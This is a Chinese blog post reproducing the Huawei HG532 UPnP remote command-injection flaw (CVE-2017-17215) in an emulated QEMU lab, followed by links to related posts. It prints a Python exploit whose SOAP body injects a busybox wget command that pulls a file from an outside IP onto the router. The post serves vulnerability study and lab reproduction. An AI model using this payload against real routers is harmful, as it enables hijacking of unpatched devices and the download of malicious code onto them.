华为HG532远程命令执行漏洞

最新推荐文章于 2023-05-23 15:50:02 发布
最新推荐文章于 2023-05-23 15:50:02 发布
阅读量818 收藏
点赞数
分类专栏: IoT
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yalecaltech/article/details/117321765
版权

根据check point的报告(https://research.checkpoint.com/good-zero-day-skiddie/)该远程命令执行漏洞的漏洞点位于 UPnP 服务中。
先看看报告的关键信息
在这里插入图片描述

分析upnp描述信息后,发现该设备支持名为DeviceUpgrade的一种服务类型
设备可以通过这种服务更新固件,具体过程是向“/ctrlt/DeviceUpgrade_1”这个地址提交请求,请求中包含NewStatusURL及NewDownloadURL两个元素。远程管理员可以通过该漏洞在设备上执行任意命令 将shell元字符 注入NewStatusURL以及NewDownloadURL元素中。

我们将固件中负责 UPnP 服务的 upnp 程序用 IDA来调试
Strings window中ctrl+f进行查找newstatus
在这里插入图片描述

双击来到ida view-a
在这里插入图片描述

交叉引用
在这里插入图片描述

关键的地方如下所示
在这里插入图片描述
在这里插入图片描述

流程大概是这样的:
程序通过ATP_XML_GetChildNodeByName函数获取xml中的节点,并且未经过检查就直接与upg -g -U %s -t ‘1 Firmware Upgrade Image’ -c upnp -r %s -d -拼接,然后使用system函数进行执行。

那么就有利用思路了:
首先在输入单引号将前面的字符串闭合,然后再注入相应的执行命令即可,如需要执行whoami命令,则需要做的就是构造’;whoami;节点即可。通过ATP_XML_GetChildNodeByName函数处理后,该节点字符串与upg -g -U %s -t ‘1 Firmware Upgrade Image’ -c upnp -r %s -d -拼接得到upg -g -U %s -t ‘1 Firmware Upgrade Image’ -c upnp -r ';whoami; -d -,然后执行system调用,实现注入。
这样exp就好写了,exp里要执行的是wget
import requests

headers = {
“Authorization”: “Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669”
}

data = ‘’’<?xml version="1.0" ?>
<s:Envelope xmlns:s=“http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=“http://schemas.xmlsoap.org/soap/encoding/”>
<s:Body><u:Upgrade xmlns:u=“urn:schemas-upnp-org:service:WANPPPConnection:1”>
;/bin/busybox wget -g 98.168.241.128 -l /tmp/1 -r /1;
HUAWEIUPNP
</u:Upgrade>
</s:Body>
</s:Envelope>
‘’’
待会儿我们复现时会用到这个exp。

接下来我们进行复现
用到三个文件:
router.rar
debian_squeeze_mips_standard.qcow2
vmlinux-2.6.32-5-4kc-malta
第一个是华为的路由器文件,后两个是debian mips qemu镜像
我们先解压路由器文件
在这里插入图片描述

bin文件就是我们需要进一步使用binwalk提取的
在这里插入图片描述

命令执行后多了一个文件夹
进入如图所示的路径
在这里插入图片描述

file看看upnp,可以知道是mips大端序32位可执行文件
在前面的漏洞报告中我们看到有些关键字:ctrlt,deviceupgrade等,以及37215(upnp端口)我们使用这些关键字来搜索看看有哪些文件
在这里插入图片描述

因为漏洞报告中的exp需要我们与路由器进行通信,所以我们还需要执行以下命令给qemu模拟环境进行网络配置
网络接口配置文件应修改如图
在这里插入图片描述

qemu的网络接口启动文件修改如图
在这里插入图片描述

赋予权限
在这里插入图片描述

重启网络
在这里插入图片描述

关闭ens33,启动br0
在这里插入图片描述

回到之前的文件夹下,执行下面的命令,启动qemu
sudo qemu-system-mips -M malta -kernel vmlinux-2.6.32-5-4kc-malta -hda debian_squeeze_mips_standard.qcow2 -append “root=/dev/sda1 console=tty0” -net nic,macaddr=00:16:3e:00:00:01 -net tap
在这里插入图片描述

可以看到qemu正在启动
在这里插入图片描述

输入root/root
在这里插入图片描述

输入ifconfig注意到ip为192.168.1.107,网卡对应的为eth1
注意,如果你在操作的时候没有这一步,可以到配置文件中设置
在这里插入图片描述

将红色的地方改为eth1即可
回到shell后输入ifup eth1即可

我们将前面解压出的固件文件系统使用scp拷贝到qemu环境
scp –r 文件系统路径 qemu路径
在这里插入图片描述

由于qemu速度较慢,不方便,我们在ubuntu上ssh连过去操作
在这里插入图片描述

查看是否拷贝过来了
在这里插入图片描述

前面我们进行关键字搜索的时候得到了两个文件/upnp,/mic
接下来尝试运行
在这里插入图片描述

无法运行,这种情况我们之前的实验中也碰到过,是因为缺少so文件
我们切换根目录到路由器文件系统
在这里插入图片描述

再次执行
在这里插入图片描述

在ubuntu这边测试下看看37215段端口开了没有
在这里插入图片描述

开了
前面的exp我这里写到了exp.py
需要注意
在这里插入图片描述

第一处的ip改为qemu的ip,第二处的ip改为ubuntu的ip
监听80端口
在这里插入图片描述

另开一个终端执行我们的exp
在这里插入图片描述

发现监听端口的那个终端收到了发来的wget请求包
在这里插入图片描述

说明漏洞利用成功。

参考:

  1. https://research.checkpoint.com/good-zero-day-skiddie/
Elwood Ying
关注
专栏目录
华为HG532系列路由器命令注入漏洞复现 CVE-2017-17215
afei001
11-02 1082
华为HG532系列路由器是一款为家庭和小型办公用户打造的高速无线路由器产品。2017年11月27日Check Point团队报告华为HG532产品的远程命令执行漏洞(CVE-2017-17215)。通过认证的攻击者可以向37215端口发送恶意报文进行攻击。成功的利用可能导致远程执行任意代码。据vuldb描述,该漏洞被作为一个非公开的零日漏洞处理了至少85天。
华为路由器远程命令执行漏洞复现(CVE-2017-17215)
Zeker62的博客
12-23 7080
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值。 CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞,可以执行任意的命令 远程命令执行漏洞,没有对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造的语句提交,让服务器端执行。例如web服务器中的system、eval、exec等函数,在上面的CVE-2020-3452也算是远程命令执行漏洞的一种。 漏洞复现 环境搭建 我使用的是Windows商店下载
debian 重复执行sh_【物联网漏洞复现】HUAWEI HG532系列路由器远程命令执行漏洞
weixin_33269743的博客
12-30 140
华为HG532e路由器是一款专为家庭和小型办公用户精心打造的高速无线路由产品。网络侧提供高速ADSL接口,用于连接ADSL宽带;用户侧提供无线和有线两种接入方式。HG532e路由器具有无线局域网、路由功能、防火墙和家长控制功能、方便安全的配置管理等主要功能。获取固件下载地址:https://ia601506.us.archive.org/22/items/RouterHG532e/rou...
HG532e路由器远程命令执行漏洞复现
qq_41326328的博客
09-29 2254
最近一直在复现关于路由器的漏洞,前俩天复现了D-link的某款溢出漏洞,感觉做起来有很多坑,一般都是搭建环境造成的坑,在这以华为HG532e的远程命令执行漏洞做出详细的步骤,供大家参考。我是个IOT新手,发文章一来是想把自己的实验记录一下,二来能够分享和交流一下技术和经验。
CVE-2017-17215 - 华为HG532命令注入漏洞分析
weixin_30530339的博客
08-03 196
前言 前面几天国外有个公司发布了该漏洞的详情。入手的二手 hg532 到货了,分析测试一下。 固件地址:https://ia601506.us.archive.org/22/items/RouterHG532e/router%20HG532e.rar 正文 漏洞位于 upnp 服务处理 升级的流程中,用于设备升级的 upnp 服务 xml 配置文件为 etc/upnp/DevUpg.xml. &l...
华为HG8XXX系列V300R013C10SPC103固件
04-01
具备完整的shell访问权限意味着用户能够执行更多的系统级命令,包括查看设备状态、调整网络设置、安装第三方软件或者优化性能。这对于高级用户和网络管理员来说非常有用,他们可以自定义设备以满足特定需求或解决...
HG532eV100R001C01B020_upgrade_packet.bin
08-07
个人用于CVE-2017-17215华为路由器漏洞固件 ...定制版的华为HG532具有远程执行代码漏洞。 经过身份验证的攻击者可以将恶意数据包发送到端口37215,以发起攻击。 成功的利用可能导致远程执行任意代码。
华为HG8245最新固件V1R002C01S211
01-14
华为HG8245是一款广泛应用于家庭和企业网络的光纤接入终端设备,它主要用于实现光信号到电信号的转换,并提供高速的宽带上网服务。这款设备的最新固件版本为V1R002C01S211,它是设备软件的核心组成部分,负责管理和...
CVE-2017-17215(华为HG532远程命令执行漏洞)复现问题与解决方案
a5555678744的博客
09-29 1563
环境准备: qemu环境的准备: 可以看freebuf上大佬的博客 通过CVE-2017-17215学习路由器漏洞分析,从入坑到放弃 - FreeBuf网络安全行业门户d 注意事项: 1.最好就用Ubuntu16.04,不要问我为什么知道的,强上Ubuntu20.04留下的只有泪。 2.上面这一步中可能遇到qemu-ifup这个文件本身就存在的问题,建议备份之后删掉重写成博客中那个样子。 3.博客中从eth0切换到eth1的操作好像是必定要做的,但是我遇到了一个严重的问题,q.
HG532e漏洞分析
abc380620175的博客
03-04 465
前言 在复现这个洞的过程中踩了不少坑,花了很长时间才把环境跑起来,感觉真是不容易。一方面分析一下漏洞产生的原因,一方面记录一下出现问题的解决方法。 漏洞原理 upnp 程序的 37215 端口存在任意命令注入,参考: https://www.cnblogs.com/hac425/p/9416936.html 将 ./bin/upnp 加载到 Ghidra 中进行伪代码的生成,定位到 0x...
HG532E 固件 V15
04-06
HG532E 固件 V15。 HG532e_固件_V100R001C02B015_中国渠道_05011ENB HG532E
华为hg532e设置虚拟服务器,电信光猫怎么连接华为HG532e一体机并设置上网?
weixin_31746149的博客
08-13 1493
光猫连接华为HG532e一体机设置方法1、设备升级,电脑连接HG532E,进入后,把固件升到HG532e V100R001C02B015,升级后能看到的。2、在HG界面里点击上行模式切换,这个以前没有的,升级后才有的。切换后会把LAN1接口变为WAN接口。WAN连接设置显示上行模式:以太网。3、把HG的 LAN1连接到光猫上,别的三个LAN接口随便用一个连接到电脑上。路由器的指示灯: intern...
记一次华为HG532固件模拟
最新发布
神使墨丘利的博客
05-23 693
需要注意的是,此时设备的ip地址已经发生了更改,我们在虚拟机中使用ifconfig查看网卡状态,发现之前配置的ip地址没有了,这是由于有些设备在启动的过程中,会自动将之前的一些ip配置信息删除掉。因此,设备启动后,仍然需要手动配置一下ip。这里不直接在虚拟机中登录虚拟机,而在主机上使用ssh登录虚拟机,原因在于虚拟机在启动路由器的过程中,会更改之前配置的ip地址,导致网页无法访问的情况。使用一个可执行文件的目的在于不用每次都输入一大串的命令,只需要每次使用./执行该文件即可进行相应的配置。
华为路由器CVE-2017-17215-HG532
PMJ的博客
01-22 5891
华为路由器CVE-2017-17215-HG532 漏洞描述 官方 该远程命令执行漏洞是位于UPnP服务中的,该设备支持名为DeviceUpgrade的一种服务类型 设备可以通过这种服务更新固件,具体过程是向“/ctrlt/DeviceUpgrade_1”这个地址提交请求,请求中包含NewStatusURL及NewDownloadURL两个元素。远程管理员可以通过该漏洞在设备上执行任意命令 将shell元字符 注入NewStatusURL以及NewDownloadURL元素中。 分析漏洞 下载固件: ht
华为路由器 CVE 2017-17215 命令注入漏洞复现
weixin_44229639的博客
12-09 4098
华为路由器 CVE 2017-17215 命令注入漏洞复现
HG532命令执行漏洞复现(CVE-2017-17215)
The54No1的博客
03-06 1088
注:该复现过程有详细视频资料。百度云盘AttifyOS下载地址:https://pan.baidu.com/s/1Vracsnlt5uNbdmfYK4dp8Q 密码:tvoh HG532固件 链接:https://pan.baidu.com/s/1vZt-Ww7NAFdFSbDivNHM0w 提取码:tnie Linux内核和硬盘映像 下载地址:https://people.debian.org/~aurel32/qemu/mips/打开VMware,点击左上角“文件”菜单并点击打开。选择下载的Attify
CVE-2017-17215 HG532e 远程命令执行漏洞分析
tigerOrtiger的博客
11-10 3519
CVE-2017-17215 HG532e 远程命令执行漏洞分析 0x01 前言 HG532e 是华为的一款无线路由器。 这个漏洞是由蜜罐捕获到payload 之后,才被checkpoint 披露出来的。 这都是好几年前的洞了,但是可以作为分析固件,模拟固件很好的学习例子。 接下来跟我一起来体验跑固件的乐趣吧 …QAQ happy hacking !!! 0x02 搭建固件模拟环境 首先固件模拟,需要现成的固件 下载链接 HG532e 下载不了可以留言给我。 固件模拟这里有两种方式: 一种是 利用现有
CVE-2017-17215复现,主要是解决qemu和主机连接问题,后续会继续深入分析该漏洞文件
darui_csdn的博客
08-08 592
一、基本信息: 定制版的华为HG532具有远程执行代码漏洞。 经过身份验证的攻击者可以将恶意数据包发送到端口37215,以发起攻击。 成功的利用可能导致远程执行任意代码。该漏洞payload由蜜罐所捕获发现。利用原理是利用upnp服务中的注入漏洞实现任意命令执行。 二、配置复现环境: 1. 安装qemu sudo apt-get install qemu sudo apt-get install qemu-user-static sudo apt-get install qemu-system 2. 网
华为防火墙可以远程执行命令
03-27
作为一名AI语音助手,我无法对华为防火墙的具体技术进行评估,但是根据网络安全的最佳实践,远程执行命令是一个非常危险的操作,容易被黑客利用进行攻击。因此,如果您正在使用华为防火墙或任何其他网络安全设备,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值